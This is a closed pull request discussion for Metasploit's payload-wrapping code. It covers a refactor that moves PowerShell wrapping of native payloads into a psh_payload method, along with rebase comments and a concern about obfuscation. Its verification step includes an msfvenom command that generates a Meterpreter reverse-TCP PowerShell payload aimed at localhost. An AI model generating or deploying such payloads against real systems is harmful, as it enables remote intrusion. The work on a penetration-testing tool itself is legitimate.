Closed red0xff closed 1 year ago
I was just looking through this, and I realize that the rc4 changes are not here. Would you care to rebase this and manually add the rc4 changes made since this PR was created?
@red0xff @bwatters-r7 Any update on this?
This needs to be either rebased or have someone do a manual deconflict merge. Since the rc4 changes that need to get pulled in were relatively new and I wrote them, I was hoping for the author to deconflict and rebase/retest. It's been long enough that I can go ahead and manually deconflict and merge when I'm back on PRs.
Hey @bwatters-r7 @gwillcox-r7 , totally forgot about this pull-request, sorry for that, even forgot about its purpose / the reusability I had in mind when I opened it.
I just did a rebase, I'll test it again, and will have a look at the subsequent changes I had in mind when I opened it.
quick glance over this makes me think it breaks obfuscation of the powershell. I was never a fan of the templates thing in the 1st place, but the way things work today, you can apply obfu passes to the template's product before encoding, compressing, encrypting, etc.
Given this has been open for a while now with no conclusion on how to proceed, and the code has changed significantly since this was opened, I'm going to close this out for now. If we want to proceed with this I'd suggest that we discuss things further if there is still an interest and then look at reopening this PR.
This refactoring moves the code that wraps native payloads in a Powershell script to a separate method
psh_payload
. This can reduce redundancy, the lines are used frompsh_payload
, but are also the same at:https://github.com/rapid7/metasploit-framework/blob/b11237fea02f1c7a6776e35fedb6fb5df70a1033/modules/post/multi/manage/shell_to_meterpreter.rb#L144-L160
(If this change is approved, I'll also add a wrapper for
psh_payload
atMsf::Exploit::Powershell
, and I'll updatepost/multi/manage/shell_to_meterpreter
accordingly, I made this change because I needed to use the code inpsh_payload
for fixing another module).I also made a few minor changes to comments. The
exec_rc4
was undocumented for example.Verification
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f psh-reflection -o <PATH>
psh-reflection
format atMsf::Util::EXE
should callRex::Powershell::Payload.to_win32pe_psh_reflection
, so this should be enough to verify).